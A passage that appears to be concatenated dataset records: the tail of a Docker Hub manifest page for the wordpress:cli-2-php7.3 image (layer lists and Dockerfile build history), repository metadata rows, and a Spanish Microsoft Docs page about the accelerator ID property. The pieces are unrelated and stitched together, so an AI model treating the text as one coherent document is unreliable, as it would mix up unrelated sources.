`sha256:dc479ffe3ce08c72ca6c36301358bb1af9485cdc58ebe2f74fff2162760f465f` Last Modified: Tue, 15 Jan 2019 11:50:10 GMT Size: 136.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:fdca229d1af9100a74eec9c3e4c376a7830c57e889a0eb9244ffdcb092d43c06` Last Modified: Tue, 15 Jan 2019 11:50:12 GMT Size: 1.2 MB (1216909 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d67601089ee1c2e56a53619a73f1823c50692f84e56742882ed0d5d4698de1e7` Last Modified: Tue, 15 Jan 2019 11:50:10 GMT Size: 417.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `wordpress:cli-2-php7.3` - linux; 386 ```console $ docker pull wordpress@sha256:28e36423dc0c6e123f24089cb4735aebce7077d2c422dc8b84cbfb36550d833b ``` - Docker Version: 18.06.1-ce - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **45.0 MB (45024534 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:14ac43947e13e700fa384e2c494795788a962c51960014873f95fc1ded0975cc` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["wp","shell"]` ```dockerfile # Fri, 21 Dec 2018 11:40:13 GMT ADD file:38576b24298c124265c8fffb7bc8fdb0c144d99dcce4e9942bdcceb936830ba6 in / # Fri, 21 Dec 2018 11:40:14 GMT COPY file:a10c133d8d5e9af3a9a1610709d3ed2f85b1507f1ba5745ac12bb495974e3fe6 in /etc/localtime # Fri, 21 Dec 2018 11:40:14 GMT CMD ["/bin/sh"] # Fri, 21 Dec 2018 12:26:09 GMT ENV PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c # Fri, 21 Dec 2018 12:26:10 GMT RUN apk add --no-cache --virtual .persistent-deps ca-certificates curl tar xz libressl # Fri, 21 Dec 2018 12:26:11 GMT RUN set -x && addgroup -g 82 -S www-data && adduser -u 82 -D -S -G www-data www-data # Fri, 21 Dec 2018 12:26:11 GMT ENV PHP_INI_DIR=/usr/local/etc/php # Fri, 21 Dec 2018 12:26:12 GMT RUN mkdir -p $PHP_INI_DIR/conf.d # Fri, 21 Dec 2018 12:26:12 GMT ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 12:26:12 GMT ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 12:26:12 GMT ENV PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie # Fri, 21 Dec 2018 12:26:13 GMT ENV GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D # Fri, 11 Jan 2019 12:26:58 GMT ENV PHP_VERSION=7.3.1 # Fri, 11 Jan 2019 12:26:58 GMT ENV PHP_URL=https://secure.php.net/get/php-7.3.1.tar.xz/from/this/mirror PHP_ASC_URL=https://secure.php.net/get/php-7.3.1.tar.xz.asc/from/this/mirror # Fri, 11 Jan 2019 12:26:59 GMT ENV PHP_SHA256=cfe93e40be0350cd53c4a579f52fe5d8faf9c6db047f650a4566a2276bf33362 PHP_MD5= # Fri, 11 Jan 2019 12:27:04 GMT RUN set -xe; apk add --no-cache --virtual .fetch-deps gnupg wget ; mkdir -p /usr/src; cd /usr/src; wget -O php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_MD5" ]; then echo "$PHP_MD5 *php.tar.xz" | md5sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then wget -O php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; command -v gpgconf > /dev/null && gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apk del .fetch-deps # Fri, 11 Jan 2019 12:27:04 GMT COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/ # Fri, 11 Jan 2019 12:32:33 GMT RUN set -xe && apk add --no-cache --virtual .build-deps $PHPIZE_DEPS argon2-dev coreutils curl-dev libedit-dev libressl-dev libsodium-dev libxml2-dev sqlite-dev && export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" && docker-php-source extract && cd /usr/src/php && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" && ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-curl --with-libedit --with-openssl --with-zlib $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') $PHP_EXTRA_CONFIGURE_ARGS && make -j "$(nproc)" && make install && { find /usr/local/bin /usr/local/sbin -type f -perm +0111 -exec strip --strip-all '{}' + || true; } && make clean && cp -v php.ini-* "$PHP_INI_DIR/" && cd / && docker-php-source delete && runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )" && apk add --no-cache --virtual .php-rundeps $runDeps && apk del .build-deps && pecl update-channels && rm -rf /tmp/pear ~/.pearrc # Fri, 11 Jan 2019 12:32:34 GMT COPY multi:ca5e0e0a22a9acaec52323defcda7c7634bb6522f257ec20bee1888aede2387a in /usr/local/bin/ # Fri, 11 Jan 2019 12:32:35 GMT RUN docker-php-ext-enable sodium # Fri, 11 Jan 2019 12:32:35 GMT ENTRYPOINT ["docker-php-entrypoint"] # Fri, 11 Jan 2019 12:32:35 GMT CMD ["php" "-a"] # Fri, 11 Jan 2019 15:53:40 GMT RUN set -ex; apk add --no-cache --virtual .build-deps libjpeg-turbo-dev libpng-dev libzip-dev ; docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr; docker-php-ext-install gd mysqli opcache zip; runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local/lib/php/extensions | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )"; apk add --virtual .wordpress-phpexts-rundeps $runDeps; apk del .build-deps # Fri, 11 Jan 2019 15:53:41 GMT RUN { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; echo 'opcache.enable_cli=1'; } > /usr/local/etc/php/conf.d/opcache-recommended.ini # Fri, 11 Jan 2019 15:53:42 GMT RUN apk add --no-cache bash less mysql-client # Fri, 11 Jan 2019 15:53:43 GMT RUN set -ex; mkdir -p /var/www/html; chown -R www-data:www-data /var/www/html # Fri, 11 Jan 2019 15:53:43 GMT WORKDIR /var/www/html # Fri, 11 Jan 2019 15:53:44 GMT VOLUME [/var/www/html] # Fri, 11 Jan 2019 15:53:44 GMT ENV WORDPRESS_CLI_GPG_KEY=63AF7AA15067C05616FDDD88A3A2E8F226F0BC06 # Fri, 11 Jan 2019 15:53:44 GMT ENV WORDPRESS_CLI_VERSION=2.1.0 # Fri, 11 Jan 2019 15:53:44 GMT ENV WORDPRESS_CLI_SHA512=c2ff556c21c85bbcf11be38d058224f53d3d57a1da45320ecf0079d480063dcdc11b5029b94b0b181c1e3bec84745300cd848d28065c0d3619f598980cc17244 # Fri, 11 Jan 2019 15:53:48 GMT RUN set -ex; apk add --no-cache --virtual .fetch-deps gnupg ; curl -o /usr/local/bin/wp.gpg -fSL "https://github.com/wp-cli/wp-cli/releases/download/v${WORDPRESS_CLI_VERSION}/wp-cli-${WORDPRESS_CLI_VERSION}.phar.gpg"; export GNUPGHOME="$(mktemp -d)"; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$WORDPRESS_CLI_GPG_KEY"; gpg --batch --decrypt --output /usr/local/bin/wp /usr/local/bin/wp.gpg; command -v gpgconf && gpgconf --kill all || :; rm -rf "$GNUPGHOME" /usr/local/bin/wp.gpg; echo "$WORDPRESS_CLI_SHA512 */usr/local/bin/wp" | sha512sum -c -; chmod +x /usr/local/bin/wp; apk del .fetch-deps; wp --allow-root --version # Fri, 11 Jan 2019 15:53:48 GMT COPY file:7798dc600ff57df68d7de781fd8834d5a9371b2ab13ab9649086b34ee0e38fcf in /usr/local/bin/ # Fri, 11 Jan 2019 15:53:48 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Fri, 11 Jan 2019 15:53:49 GMT USER www-data # Fri, 11 Jan 2019 15:53:49 GMT CMD ["wp" "shell"] ``` - Layers: - `sha256:25bcd1068fdd02354e6b3fb4ebbad1a9c1df7f5ec2d61aa88a337345415dc102` Last Modified: Fri, 21 Dec 2018 11:40:46 GMT Size: 2.3 MB (2271567 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:795c3ef9c057ef60e7a4a088655adecaccd21d68099ad1f654bccd015ab319da` Last Modified: Fri, 21 Dec 2018 11:40:46 GMT Size: 176.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:4811baf1f023d21ea625c97101dbaffec612a7fc948ff1d9f1e85badb90282f7` Last Modified: Fri, 21 Dec 2018 14:03:58 GMT Size: 1.5 MB (1453187 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:66ce10d169b702fb314523985cab18b12c3d56cf08f625154b27d0847e96f089` Last Modified: Fri, 21 Dec 2018 14:03:58 GMT Size: 1.3 KB (1252 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:2a89858ddd116f7d2220d5ff7f60ae246411089bb3c686a47294192ef6b55c9d` Last Modified: Fri, 21 Dec 2018 14:03:57 GMT Size: 168.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:1a15eb1aa025b26e4bdb383103435fc1d9a241665641a91e323f1975311562bd` Last Modified: Fri, 11 Jan 2019 14:53:03 GMT Size: 12.0 MB (11963992 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:a5dfbc7c6369e964cfd51c8310ce866c4b7efe8864dc2148b47c9a22101f8839` Last Modified: Fri, 11 Jan 2019 14:53:02 GMT Size: 500.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:dd6137de112254b1e9b950339b1f52221288845e6564d04c1e5e44dfc11fdbd8` Last Modified: Fri, 11 Jan 2019 14:53:07 GMT Size: 16.5 MB (16535629 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:9a9c4c23371061fd032905a70ad2a59fe4f2a61447d6330985c32b85c9c230c5` Last Modified: Fri, 11 Jan 2019 14:53:02 GMT Size: 2.2 KB (2173 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:88baad8019d20ffd24b3b9c5cc2b9ebd9384cb3811034d989877f53e702a8fb0` Last Modified: Fri, 11 Jan 2019 14:53:02 GMT Size: 71.0 KB (70995 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:53e49ca90defdd46eb9f957b4ba79b83d283db75d14f613e5fbed7a2181f2815` Last Modified: Fri, 11 Jan 2019 15:56:59 GMT Size: 2.3 MB (2275367 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:6a9e855b3c638b6d69d110cdb17ebb4cd677ed54df4da533e12d36dab6cdab56` Last Modified: Fri, 11 Jan 2019 15:56:57 GMT Size: 335.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:3537bdb8a7312ab142a810549967c4a896415fc78f1e01c9c8dd1459e407082f` Last Modified: Fri, 11 Jan 2019 15:57:00 GMT Size: 9.2 MB (9231630 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:41b15af96467b89104645ec62b823dd6de5dcd69fc792197bcc2eb431b2ee771` Last Modified: Fri, 11 Jan 2019 15:56:57 GMT Size: 135.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:0e331d34ad33215a06783679e2449da0d56ab328b22f229d1bc6d64ee4d0179c` Last Modified: Fri, 11 Jan 2019 15:56:58 GMT Size: 1.2 MB (1217012 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:a3a901677f1601bdc50dbef6d9a759db01f0beebeb32c8d40a2642f12b9c3722` Last Modified: Fri, 11 Jan 2019 15:56:57 GMT Size: 416.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `wordpress:cli-2-php7.3` - linux; ppc64le ```console $ docker pull wordpress@sha256:d1c0ca765caeaea78be37e24dcfd69905420ea7e5c4a43617458fa882e638e98 ``` - Docker Version: 18.06.1-ce - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **43.8 MB (43752446 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:4154c48f934c19a043a833e3dd67850e337f2a5ced2a819e23c9817b9930a88a` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["wp","shell"]` ```dockerfile # Fri, 21 Dec 2018 09:44:05 GMT ADD file:81f8badc2215d9ccd8f5406b89b63bf0b407b3e877f6232bd11153780c551392 in / # Fri, 21 Dec 2018 09:44:06 GMT COPY file:a10c133d8d5e9af3a9a1610709d3ed2f85b1507f1ba5745ac12bb495974e3fe6 in /etc/localtime # Fri, 21 Dec 2018 09:44:10 GMT CMD ["/bin/sh"] # Fri, 21 Dec 2018 10:32:58 GMT ENV PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c # Fri, 21 Dec 2018 10:33:10 GMT RUN apk add --no-cache --virtual .persistent-deps ca-certificates curl tar xz libressl # Fri, 21 Dec 2018 10:33:18 GMT RUN set -x && addgroup -g 82 -S www-data && adduser -u 82 -D -S -G www-data www-data # Fri, 21 Dec 2018 10:33:23 GMT ENV PHP_INI_DIR=/usr/local/etc/php # Fri, 21 Dec 2018 10:33:29 GMT RUN mkdir -p $PHP_INI_DIR/conf.d # Fri, 21 Dec 2018 10:33:35 GMT ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 10:33:41 GMT ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 10:33:45 GMT ENV PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie # Fri, 21 Dec 2018 10:33:50 GMT ENV GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D # Fri, 11 Jan 2019 09:56:00 GMT ENV PHP_VERSION=7.3.1 # Fri, 11 Jan 2019 09:56:01 GMT ENV PHP_URL=https://secure.php.net/get/php-7.3.1.tar.xz/from/this/mirror PHP_ASC_URL=https://secure.php.net/get/php-7.3.1.tar.xz.asc/from/this/mirror # Fri, 11 Jan 2019 09:56:03 GMT ENV PHP_SHA256=cfe93e40be0350cd53c4a579f52fe5d8faf9c6db047f650a4566a2276bf33362 PHP_MD5= # Fri, 11 Jan 2019 09:56:20 GMT RUN set -xe; apk add --no-cache --virtual .fetch-deps gnupg wget ; mkdir -p /usr/src; cd /usr/src; wget -O php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_MD5" ]; then echo "$PHP_MD5 *php.tar.xz" | md5sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then wget -O php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; command -v gpgconf > /dev/null && gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apk del .fetch-deps # Fri, 11 Jan 2019 09:56:21 GMT COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/ # Fri, 11 Jan 2019 10:00:02 GMT RUN set -xe && apk add --no-cache --virtual .build-deps $PHPIZE_DEPS argon2-dev coreutils curl-dev libedit-dev libressl-dev libsodium-dev libxml2-dev sqlite-dev && export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" && docker-php-source extract && cd /usr/src/php && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" && ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-curl --with-libedit --with-openssl --with-zlib $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') $PHP_EXTRA_CONFIGURE_ARGS && make -j "$(nproc)" && make install && { find /usr/local/bin /usr/local/sbin -type f -perm +0111 -exec strip --strip-all '{}' + || true; } && make clean && cp -v php.ini-* "$PHP_INI_DIR/" && cd / && docker-php-source delete && runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )" && apk add --no-cache --virtual .php-rundeps $runDeps && apk del .build-deps && pecl update-channels && rm -rf /tmp/pear ~/.pearrc # Fri, 11 Jan 2019 10:00:04 GMT COPY multi:ca5e0e0a22a9acaec52323defcda7c7634bb6522f257ec20bee1888aede2387a in /usr/local/bin/ # Fri, 11 Jan 2019 10:00:09 GMT RUN docker-php-ext-enable sodium # Fri, 11 Jan 2019 10:00:12 GMT ENTRYPOINT ["docker-php-entrypoint"] # Fri, 11 Jan 2019 10:00:15 GMT CMD ["php" "-a"] # Tue, 15 Jan 2019 11:11:24 GMT RUN set -ex; apk add --no-cache --virtual .build-deps libjpeg-turbo-dev libpng-dev libzip-dev ; docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr; docker-php-ext-install gd mysqli opcache zip; runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local/lib/php/extensions | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )"; apk add --virtual .wordpress-phpexts-rundeps $runDeps; apk del .build-deps # Tue, 15 Jan 2019 11:11:27 GMT RUN { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; echo 'opcache.enable_cli=1'; } > /usr/local/etc/php/conf.d/opcache-recommended.ini # Tue, 15 Jan 2019 11:11:31 GMT RUN apk add --no-cache bash less mysql-client # Tue, 15 Jan 2019 11:11:35 GMT RUN set -ex; mkdir -p /var/www/html; chown -R www-data:www-data /var/www/html # Tue, 15 Jan 2019 11:11:36 GMT WORKDIR /var/www/html # Tue, 15 Jan 2019 11:11:39 GMT VOLUME [/var/www/html] # Tue, 15 Jan 2019 11:11:41 GMT ENV WORDPRESS_CLI_GPG_KEY=63AF7AA15067C05616FDDD88A3A2E8F226F0BC06 # Tue, 15 Jan 2019 11:11:42 GMT ENV WORDPRESS_CLI_VERSION=2.1.0 # Tue, 15 Jan 2019 11:11:43 GMT ENV WORDPRESS_CLI_SHA512=c2ff556c21c85bbcf11be38d058224f53d3d57a1da45320ecf0079d480063dcdc11b5029b94b0b181c1e3bec84745300cd848d28065c0d3619f598980cc17244 # Tue, 15 Jan 2019 11:11:52 GMT RUN set -ex; apk add --no-cache --virtual .fetch-deps gnupg ; curl -o /usr/local/bin/wp.gpg -fSL "https://github.com/wp-cli/wp-cli/releases/download/v${WORDPRESS_CLI_VERSION}/wp-cli-${WORDPRESS_CLI_VERSION}.phar.gpg"; export GNUPGHOME="$(mktemp -d)"; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$WORDPRESS_CLI_GPG_KEY"; gpg --batch --decrypt --output /usr/local/bin/wp /usr/local/bin/wp.gpg; command -v gpgconf && gpgconf --kill all || :; rm -rf "$GNUPGHOME" /usr/local/bin/wp.gpg; echo "$WORDPRESS_CLI_SHA512 */usr/local/bin/wp" | sha512sum -c -; chmod +x /usr/local/bin/wp; apk del .fetch-deps; wp --allow-root --version # Tue, 15 Jan 2019 11:11:53 GMT COPY file:7798dc600ff57df68d7de781fd8834d5a9371b2ab13ab9649086b34ee0e38fcf in /usr/local/bin/ # Tue, 15 Jan 2019 11:11:55 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 15 Jan 2019 11:11:57 GMT USER www-data # Tue, 15 Jan 2019 11:11:58 GMT CMD ["wp" "shell"] ``` - Layers: - `sha256:5fac6f91a5114ca7e803950377d1db527386361cdf48b205eed63d8ab99820c3` Last Modified: Fri, 21 Dec 2018 09:45:58 GMT Size: 2.2 MB (2194772 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:6c21fc409a1bc2fd1e54e11e2bd2beb4251b1c6d49aee187e7d28df20b2004b1` Last Modified: Fri, 21 Dec 2018 09:45:56 GMT Size: 177.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:e97d043655dbdb6d40a361d7dc75c1ba30d905a802fa795cf7d567ad05245d76` Last Modified: Fri, 21 Dec 2018 12:04:28 GMT Size: 1.3 MB (1322324 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:6e42ae702569bdff3d1762659fb2ec8eb1a3aa153705c2240bf46a52c81aa408` Last Modified: Fri, 21 Dec 2018 12:04:27 GMT Size: 1.3 KB (1283 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:cc7bb9008fe21d12c735aed250535f34b51e732ec5488ca7e1772bca1a0b7028` Last Modified: Fri, 21 Dec 2018 12:04:26 GMT Size: 197.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:7b15b723317bf9ef8c08866941ab73a67b03acd9ea913df6ec88e7478f7992f8` Last Modified: Fri, 11 Jan 2019 11:24:19 GMT Size: 12.0 MB (11964020 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:fffc949dbd2b55ba2290cb256c4482ed3f476d88671a98d74309c1de4e18d2b2` Last Modified: Fri, 11 Jan 2019 11:24:17 GMT Size: 498.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:1fe2c25822ff110ad0abfbe5a15d1cb56d6e1e0a662514b7b4b87db80e2d534e` Last Modified: Fri, 11 Jan 2019 11:24:25 GMT Size: 15.8 MB (15769748 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:c9bfa61e1d0d4b7adbd82b91531e3481f46650b6e97ab62525eb85e3ccd74252` Last Modified: Fri, 11 Jan 2019 11:24:17 GMT Size: 2.2 KB (2171 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:05bdc5f16b229afd71a090863cc009ba63e4adf809b2b4f1b16f9008e002ee8c` Last Modified: Fri, 11 Jan 2019 11:24:17 GMT Size: 71.6 KB (71634 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:b3687bbe7ea77e9a2362ce72a13322a6e0713b7e1e0828382ca775f9eeb9cf00` Last Modified: Tue, 15 Jan 2019 11:14:40 GMT Size: 2.2 MB (2220787 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:4c249a7747c001193aaa489464ab870fa014a42b4a751b5ebe36606fe45c29cd` Last Modified: Tue, 15 Jan 2019 11:14:36 GMT Size: 337.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:105cf7fbc3a2812a0926496262b9c7dcd6a8e081925d336de047fe0a8aec9471` Last Modified: Tue, 15 Jan 2019 11:14:38 GMT Size: 9.0 MB (8986451 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:c2963b801d4c8714354b2a62f4fd43dd3f47c46a81fb77899750f0f63acc060f` Last Modified: Tue, 15 Jan 2019 11:14:36 GMT Size: 168.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d6cbda406dbb223d2aa74fe2212c0f1af89a56194b863f617610310649535ed2` Last Modified: Tue, 15 Jan 2019 11:14:36 GMT Size: 1.2 MB (1217462 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:eb21e2560be3e2adfbb9a0fd27e48bb684a55c45856aaa1b208e6b048c756b7e` Last Modified: Tue, 15 Jan 2019 11:14:36 GMT Size: 417.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
67.702427
1,403
0.722812
yue_Hant
0.23821
bb303647f5907bf3969ed66165afec9935128d09
1,291
md
Markdown
docs/windows/id-property.md
anmrdz/cpp-docs.es-es
f3eff4dbb06be3444820c2e57b8ba31616b5ff60
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/windows/id-property.md
anmrdz/cpp-docs.es-es
f3eff4dbb06be3444820c2e57b8ba31616b5ff60
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/windows/id-property.md
anmrdz/cpp-docs.es-es
f3eff4dbb06be3444820c2e57b8ba31616b5ff60
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Propiedad de Id. | Microsoft Docs ms.custom: '' ms.date: 11/04/2016 ms.technology: - cpp-windows ms.topic: conceptual dev_langs: - C++ helpviewer_keywords: - ID property ms.assetid: 756ea7ad-d39b-490d-a2ba-163c434577f0 author: mikeblome ms.author: mblome ms.workload: - cplusplus - uwp ms.openlocfilehash: 277f60b48f32ea2378a2011f61407ce4713659ee ms.sourcegitcommit: a9dcbcc85b4c28eed280d8e451c494a00d8c4c25 ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 10/25/2018 ms.locfileid: "50072972" --- # <a name="id-property"></a>ID (Propiedad) La propiedad de identificador hace referencia a cada entrada de la tabla de aceleradores en código de programa. Este es el valor de comando que va a recibir el programa cuando un usuario presiona la tecla de aceleración o una combinación de teclas. Para realizar un acelerador igual que un elemento de menú, realice sus identificadores de la misma (siempre y cuando el identificador de la tabla de aceleradores es el mismo que el identificador para el recurso de menú). ## <a name="requirements"></a>Requisitos Win32 ## <a name="see-also"></a>Vea también [Establecimiento de las propiedades de los aceleradores](../windows/setting-accelerator-properties.md)<br/> [Editor de aceleradores](../windows/accelerator-editor.md)
35.861111
469
0.786212
spa_Latn
0.858366
bb30edc7db035693e16e4288dd17a000505d90b1
1,182
md
Markdown
README.md
molotovbliss/renoise
c12f8f25386217fda65448965699f482d57e2e9c
[ "MIT" ]
null
null
null
README.md
molotovbliss/renoise
c12f8f25386217fda65448965699f482d57e2e9c
[ "MIT" ]
1
2020-09-27T10:25:51.000Z
2020-09-27T10:25:51.000Z
README.md
molotovbliss/renoise
c12f8f25386217fda65448965699f482d57e2e9c
[ "MIT" ]
null
null
null
# Dracula for [ReNoise](http://renoise.com) > A dark theme for [ReNoise](http://renoise.com) & [Redux](https://www.renoise.com/products/redux). ReNoise ![ReNoise Screenshot](./screenshot.png) Redux ![Redux Screnshot](./redux-screenshot.png) (NOTE: HDPI screenshots at 150% UI up scale on Windows 10 at 3840x2160) ## Install See [INSTALL.md](./INSTALL.md) ## Team This theme is maintained by the following person(s) and a bunch of [awesome contributors](https://github.com/dracula/template/graphs/contributors). | [![B00MER](https://github.com/molotovbliss.png?size=100)](https://github.com/molotovbliss) | | ------------------------------------------------------------------------------------------ | | [B00MER](https://github.com/molotovbliss) | ## Community - [Twitter](https://twitter.com/draculatheme) - Best for getting updates about themes and new stuff. - [GitHub](https://github.com/dracula/dracula-theme/discussions) - Best for asking questions and discussing issues. - [Discord](https://draculatheme.com/discord-invite) - Best for hanging out with the community. ## License The MIT License (MIT) see LICENSE
32.833333
147
0.646362
yue_Hant
0.314987
bb312436ffa0e6999f73a72208be57e0fd6a6658
2,075
md
Markdown
doc/practice/high-concurrency/redis-data-types.md
FLY-Open-DevOps/java-treasurebox
df472cc4af28810c91f077ac9aca43bacacf418e
[ "Apache-2.0" ]
null
null
null
doc/practice/high-concurrency/redis-data-types.md
FLY-Open-DevOps/java-treasurebox
df472cc4af28810c91f077ac9aca43bacacf418e
[ "Apache-2.0" ]
1
2022-03-07T01:29:10.000Z
2022-03-15T02:45:13.000Z
doc/practice/high-concurrency/redis-data-types.md
FLY-Open-DevOps/java-treasurebox
df472cc4af28810c91f077ac9aca43bacacf418e
[ "Apache-2.0" ]
null
null
null
